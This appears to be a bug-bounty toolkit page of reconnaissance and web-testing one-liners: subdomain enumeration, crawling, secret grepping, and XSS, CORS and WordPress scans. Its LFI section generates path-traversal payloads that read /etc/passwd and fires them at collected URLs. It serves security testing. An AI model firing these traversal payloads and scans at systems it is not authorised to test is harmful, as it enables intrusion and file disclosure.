VulnScout

Advanced Bug Hunting Toolkit & Reconnaissance Platform

Subdomain Enumeration

Subfinder Recursive

Discover subdomains with every configured source (-all) and recurse into the names it finds (-recursive); put API keys in ~/.config/subfinder/provider-config.yaml or most of the -all sources return nothing

$ subfinder -d example.com -all -recursive -o subdomains.txt

Assetfinder

Find domains and subdomains quickly

$ assetfinder --subs-only example.com > assetfinder.txt

Certificate Transparency (crt.sh)

Find subdomains via certificate transparency logs (%25 is a URL-encoded %, the SQL wildcard crt.sh expects, so the query matches every name under the domain rather than only the apex)

$ curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/^\*\.//' | sort -u > crtsh.txt

Merge & De-duplicate All Subdomains

Always merge, lower-case and de-duplicate the outputs before probing; crt.sh returns mixed case, and the same host probed twice wastes the httpx budget

$ cat subdomains.txt assetfinder.txt crtsh.txt | tr '[:upper:]' '[:lower:]' | sort -u > all_subdomains.txt

Live Subdomain Check

Filter alive subdomains with httpx

$ cat all_subdomains.txt | httpx -silent -o subdomains_alive.txt
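
The merge step above only de-duplicates. Raw enumeration output also carries wildcard entries, trailing dots, mixed case and look-alike names (example.com.evil.test, notexample.com) that crt.sh and assetfinder return and that httpx would happily probe out of scope. The function below is an added example, not part of VulnScout; it assumes the root domain is passed as the first argument and the candidate names arrive on stdin. The sample input is constructed.

```bash
# Added example (not VulnScout code): normalise and scope-filter raw
# enumeration output before it reaches httpx. $1 = root domain, stdin = names.
normalize_subs() {
    local root="$1"
    # Escape the dots so the apex is matched literally: "example.com" must not
    # match "examplexcom".
    local root_re
    root_re="$(printf '%s' "$root" | sed 's/\./\\./g')"
    # 1. lower-case: DNS is case-insensitive and crt.sh returns mixed case
    # 2. strip a leading "*." (wildcard certificates) and a trailing "."
    # 3. keep only the apex and names ending in ".<apex>"; this drops
    #    look-alikes such as example.com.evil.test and notexample.com
    # 4. de-duplicate
    tr '[:upper:]' '[:lower:]' \
      | sed -E 's/^\*\.//; s/\.$//' \
      | grep -E "^([a-z0-9-]+\.)*${root_re}$" \
      | sort -u
}

# Constructed sample of what a raw subfinder/assetfinder/crt.sh merge looks like
sample_input() {
    cat <<'EOF'
API.example.com
*.staging.example.com
www.example.com.
example.com
notexample.com
example.com.evil.test
mail.example.com
www.example.com
EOF
}

# In the real pipeline replace sample_input with:
#   cat subdomains.txt assetfinder.txt crtsh.txt
sample_input | normalize_subs example.com
```

The grep is the scope gate: anything that does not end in the literal apex is discarded, so a certificate issued for a third-party domain that merely contains the target's name never makes it into all_subdomains.txt.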

URL Collection

Katana Crawling

Active crawl to depth 5 with JavaScript parsing (-jc) and known files such as robots.txt and sitemap.xml (-kf all); -ps switches katana to passive sources only, so run it as a separate pass if you want both

$ katana -list subdomains_alive.txt -d 5 -jc -kf all -o allurls.txt

GAU + Wayback

Fetch historical URLs from Wayback, Common Crawl, OTX and URLScan; gau wants bare hostnames, so strip the scheme httpx added, then de-duplicate the combined file

$ sed -E 's#^https?://##' subdomains_alive.txt | gau --subs | urldedupe >> allurls.txt && sort -u allurls.txt -o allurls.txt

Parameter Extraction

Extract URLs with parameters

$ cat allurls.txt | grep '=' | sort -u > urls_with_params.txt

Sensitive Data Discovery

Sensitive Files

Find exposed sensitive files; the extension must be matched before an optional query string, not only at the end of the line, or every archived URL with parameters is missed

$ grep -iE '\.(bak|sql|zip|conf|env|key)(\?|$)' allurls.txt > sensitive_findings.txt

S3 Bucket Finder

Discover S3 buckets. Bucket names are global and not tied to DNS, so s3scanner takes candidate names rather than a domain; derive them from the target's name (s3scanner v3 syntax, JSON output)

$ printf '%s\n' example example-backup example-assets example-static example-dev example-prod > bucket_names.txt && s3scanner -bucket-file bucket_names.txt -provider aws -json > s3_buckets.txt

Git Repository Check

Detect exposed git repos. Probe the live hosts, not every crawled URL, and request .git/HEAD with a content match: a bare 200 on /.git/ is often a catch-all page or WAF response

$ httpx -l subdomains_alive.txt -silent -path /.git/HEAD -mc 200 -ms "ref: refs/" -o git_repos.txt

Information Disclosure Scanner

Broader extension grep (not a scanner) for files that commonly disclose information; confirm each hit returns 200 with httpx -mc 200 and is not a catch-all response before reporting it

$ grep -iE "\.(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|zip|tar\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|tar|xz|7zip|p12|pem|key|crt|csr|sh|pl|py|java|class|jar|war|ear|sqlitedb|sqlite3|dbf|db3|accdb|mdb|sqlcipher|gitignore|env|ini|conf|properties|plist|cfg)(\?|$)" allurls.txt > sensitive_disclosure.txt

API Key Finder

Searches JavaScript files for exposed API keys and tokens, keeping the file URL next to each hit so the finding can be traced; grepping for the words token or password alone matches nearly every bundle, so review hits by hand

$ grep -E '\.js(\?|$)' allurls.txt | httpx -silent -nc -mc 200 -ct | grep -i javascript | cut -d' ' -f1 | while read -r u; do curl -s "$u" | grep -iqE 'api_key|apikey|secret|token|password' && echo "$u"; done > api_keys.txt
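
Matching on the words "token" or "password" flags every JS bundle that handles a login form. What you actually want from a JS file is a credential with a recognisable shape. The function below is an added example, not VulnScout code: it matches known key formats (AWS access key IDs, Google API keys, GitHub and Stripe tokens, Slack tokens, embedded private keys) instead of keywords, and prints the file label beside each hit. The JavaScript body is constructed; the AWS key in it is the documented example key AKIAIOSFODNN7EXAMPLE.

```bash
# Added example (not VulnScout code): match credential *shapes* in JS rather
# than the words token/password. stdin = JavaScript body.
find_secrets() {
    # AKIA[0-9A-Z]{16}               AWS access key ID
    # AIza[0-9A-Za-z_-]{35}          Google API key
    # ghp_[0-9A-Za-z]{36}            GitHub personal access token
    # sk_live_[0-9A-Za-z]{24,}       Stripe live secret key
    # xox[baprs]-[0-9A-Za-z-]{10,}   Slack token
    # -----BEGIN ... PRIVATE KEY-----  embedded private key
    grep -oE 'AKIA[0-9A-Z]{16}|AIza[0-9A-Za-z_-]{35}|ghp_[0-9A-Za-z]{36}|sk_live_[0-9A-Za-z]{24,}|xox[baprs]-[0-9A-Za-z-]{10,}|-----BEGIN [A-Z ]*PRIVATE KEY-----' \
      | sort -u
}

# $1 = label for the file (its URL in practice), stdin = JavaScript body.
# Prints "label: hit" lines, nothing when the file is clean.
scan_js_file() {
    local label="$1" hits
    hits="$(find_secrets)" || true        # grep exits 1 on no match; that is not an error here
    [ -n "$hits" ] && printf '%s: %s\n' "$label" "$hits"
    return 0
}

# Constructed bundle: one real key shape among the usual harmless "token"/"password" mentions
sample_js() {
    cat <<'EOF'
var csrfToken = document.querySelector('meta[name=token]').content;
const cfg = { region: "us-east-1", accessKeyId: "AKIAIOSFODNN7EXAMPLE" };
function login(password) { return fetch('/api/login', {body: password}); }
const gh = "ghp_" + "x".repeat(36); // assembled at runtime, not a literal
EOF
}

sample_js | scan_js_file bundle.js
```

To run it over the crawl output: `while read -r u; do curl -s "$u" | scan_js_file "$u"; done < js_files.txt`. The keyword grep from the page flags all four lines of the sample; the shape match flags only the AWS key, and the URL label survives the pipeline so the finding can be reproduced.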

XSS Testing

XSS Finding Pipeline

Select XSS-prone parameters with gf, collapse near-duplicate URLs with uro, then let Gxss confirm which parameter values are reflected in the response before spending requests on payloads

$ cat urls_with_params.txt | gf xss | uro | Gxss -c 100 | tee xss_findings.txt

Dalfox Scanner

Advanced XSS vulnerability scanner

$ cat urls_with_params.txt | dalfox pipe -o xss_dalfox.txt

Nuclei XSS Templates

Run the nuclei templates tagged xss (these test reflected XSS in known products; stored XSS in forms needs manual testing, since the injection point and the rendering page differ)

$ nuclei -l allurls.txt -tags xss -o xss_nuclei.txt

DOM XSS Detection

Triage JavaScript files for DOM XSS sources and sinks. Gxss and dalfox test parameter reflection and do nothing useful with a .js body, so grep the scripts for sinks and sources instead and confirm candidates in a browser

$ grep -E '\.js(\?|$)' allurls.txt | sort -u > js_files.txt && while read -r u; do curl -s "$u" | grep -qE 'innerHTML|outerHTML|document\.write|eval\(|location\.(hash|search|href)' && echo "$u"; done < js_files.txt > dom_xss_candidates.txt

LFI Testing

LFI Parameter Hunt

Find LFI vulnerable parameters

$ cat allurls.txt | gf lfi | uro > lfi_findings.txt

FFUF LFI Fuzzing

Fuzz for LFI. ffuf has no -l flag; mark each parameter value as FUZZ and run ffuf per URL, matching on a passwd-file line rather than the bare string "root:", which appears in plenty of ordinary HTML

$ n=0; sed -E 's/=[^&]*/=FUZZ/g' lfi_findings.txt | while read -r u; do n=$((n+1)); ffuf -u "$u" -w payloads/lfi.txt -mr 'root:x:0' -o "lfi_results_$n.json"; done

Path Traversal Check

Quick single-payload check: substitute a traversal path for every parameter value and keep the URLs whose response contains a passwd-file line

$ sed -E 's#=[^&]*#=../../../../etc/passwd#g' lfi_findings.txt | while read -r u; do curl -s "$u" | grep -q 'root:x:0:0' && echo "HIT $u"; done > lfi_test.txt
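
A single ../../../../etc/passwd misses filters that strip one "../", decode once, or append an extension. The helpers below are an added example, not VulnScout code: they generate the variants a practitioner tries by hand (increasing depth, URL-encoded slashes, the "....//" form that survives a single strip, and the null-byte terminator for old PHP), substitute them into a URL whose parameter value is marked FUZZ, and recognise a hit by a real passwd line. The sample URL and response bodies are constructed; sending the requests is left to curl.

```bash
# Added example (not VulnScout code): traversal payload variants and hit detection.
# $1 = maximum depth (default 6). Prints one payload per line.
lfi_payloads() {
    local max="${1:-6}" i dots
    echo "/etc/passwd"                                   # absolute path, for unsanitised includes
    for i in $(seq 1 "$max"); do
        dots="$(printf '../%.0s' $(seq 1 "$i"))"        # "../" repeated i times
        echo "${dots}etc/passwd"
        echo "${dots}etc/passwd%00"                     # null byte: truncates an appended ".php" on PHP < 5.3.4
        echo "$(printf '..%%2f%.0s' $(seq 1 "$i"))etc/passwd"    # encoded slash: beats filters that check before decoding
        echo "$(printf '....//%.0s' $(seq 1 "$i"))etc/passwd"    # "....//" -> "../" after one non-recursive strip of "../"
    done
}

# $1 = URL with the parameter value replaced by FUZZ, $2 = payload.
build_lfi_url() {
    printf '%s\n' "$1" | sed "s|FUZZ|$2|"
}

# stdin = response body. Exit 0 if it contains a passwd-style root entry,
# which is far more specific than the string "root:" alone.
lfi_hit() {
    grep -qE '^root:[^:]*:0:0:'
}

# Offline demonstration: print the request URLs for depth 3.
# To fire them: lfi_payloads | while read -r p; do
#   curl -s --path-as-is "$(build_lfi_url "$target" "$p")" | lfi_hit && echo "HIT $p"; done
lfi_payloads 3 | while read -r p; do
    build_lfi_url 'https://example.com/view?file=FUZZ' "$p"   # constructed target URL
done
```

Pass --path-as-is to curl so it does not squash the "../" sequences itself before the server sees them.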

CORS Testing

Basic CORS Check

Send an attacker-controlled Origin (not the target's own) and look for it echoed in Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true; a GET with headers dumped is more reliable than HEAD, which some servers handle on a different path

$ head -1 subdomains_alive.txt | xargs -I{} curl -s -D - -o /dev/null -H "Origin: https://evil.example" {} | grep -i '^access-control' > cors_check.txt

CORScanner

Fast CORS misconfiguration scanner

$ python3 cors_scan.py -i subdomains_alive.txt -t 10 -o cors_results.txt

CORS Nuclei Scan

Scan the live hosts with the nuclei templates tagged cors (the hosts are already probed, so a second httpx pass is unnecessary)

$ nuclei -l subdomains_alive.txt -tags cors -o cors_findings.txt
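
The scanners above report a finding; deciding whether it is exploitable comes down to two headers and the origin you sent. The function below is an added example, not VulnScout code: given the Origin that was sent and the raw response headers on stdin (as curl -D - emits them, CRLF included), it classifies the policy. It assumes the attacker origin https://evil.example; all header sets are constructed.

```bash
# Added example (not VulnScout code): classify a CORS response.
# $1 = the Origin value that was sent, stdin = raw response headers.
# Prints one of: none, fixed, wildcard, wildcard+creds, null, null+creds,
# reflect, reflect+creds.
classify_cors() {
    local sent="$1" hdrs acao acac creds
    hdrs="$(cat | tr -d '\r')"                       # curl -D - uses CRLF line endings
    acao="$(printf '%s\n' "$hdrs" | grep -i '^access-control-allow-origin:' | head -n 1 \
            | sed -E 's/^[^:]*:[[:space:]]*//; s/[[:space:]]+$//')"
    acac="$(printf '%s\n' "$hdrs" | grep -i '^access-control-allow-credentials:' | head -n 1 \
            | sed -E 's/^[^:]*:[[:space:]]*//; s/[[:space:]]+$//' | tr '[:upper:]' '[:lower:]')"
    creds=""
    [ "$acac" = "true" ] && creds="+creds"
    case "$acao" in
        "")      echo "none" ;;             # no CORS header: the browser blocks the cross-origin read
        "*")     echo "wildcard$creds" ;;   # "*" with credentials is rejected by browsers; "*" alone
                                            # exposes only what an unauthenticated client sees anyway
        "null")  echo "null$creds" ;;       # null+creds: reachable from a sandboxed iframe, exploitable
        "$sent") echo "reflect$creds" ;;    # reflect+creds: arbitrary origin trusted with cookies, the
                                            # classic exploitable case; reflect alone leaks only public data
        *)       echo "fixed" ;;            # a specific allowlisted origin that is not ours
    esac
}

# Constructed headers: what a vulnerable endpoint returns for
#   curl -s -D - -o /dev/null -H "Origin: https://evil.example" URL
sample_headers() {
    printf 'HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: https://evil.example\r\nAccess-Control-Allow-Credentials: true\r\nContent-Type: application/json\r\n\r\n'
}

sample_headers | classify_cors https://evil.example
```

Only reflect+creds and null+creds let a hostile page read an authenticated response; everything else is either blocked by the browser or exposes data that was already public. Check the same endpoint with a subdomain-style origin (https://evil.example.com) and a prefix origin (https://example.com.evil.example) too, since regex allowlists often pass those while rejecting a plain attacker origin.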

WordPress Scanning

WPScan Aggressive

Comprehensive WordPress vulnerability scan. Hostnames rarely contain "wordpress", so pick targets by httpx technology detection (-td) rather than by grepping the host list; -f json makes -o write JSON

$ httpx -l subdomains_alive.txt -silent -nc -td | grep -i wordpress | cut -d' ' -f1 | head -1 | xargs -I{} wpscan --url {} --disable-tls-checks -e at,ap,u -f json -o wordpress_scan.json

WordPress Theme Detection

Identify WordPress themes and vulnerabilities

$ wpscan --url https://example.com --no-banner -e t -f json -o theme_results.json

WordPress User Enumeration

Enumerate WordPress users and plugins

$ wpscan --url https://example.com -e u,ap -f json -o wordpress_full.json

All Security Tools

Download & Install Script: These tools are included in the install-all-tools.sh script

Go-based Tools

Subfinder: Fast passive subdomain enumeration tool
HTTPx: Fast HTTP prober with multiple features
Katana: Next-generation web crawler and endpoint finder
Nuclei: Fast customizable vulnerability scanner
Assetfinder: Find all domains and subdomains owned by a given domain
Waybackurls: Fetch all URLs from Wayback Machine for a domain
GF: A wrapper around grep for patterns
Amass: In-depth DNS enumeration and mapping

Python-based Tools

LinkFinder: Extract endpoints and URLs from JavaScript files
Commix: Automated injection testing framework
Ghauri: Advanced SQL injection detection and exploitation
ParamSpider: Parameter discovery tool for security testing
WAFW00f: Identify and fingerprint WAFs
JWT-Tool: JWT token testing and exploitation
Arjun: HTTP parameter discovery tool

Advanced Tools

S3Scanner: Discover and exploit S3 buckets
SSTImap: Server-Side Template Injection scanner
SSRFmap: SSRF vulnerability testing and exploitation
LFISuite: Local File Inclusion exploitation suite
X8: Hidden parameters and endpoints discovery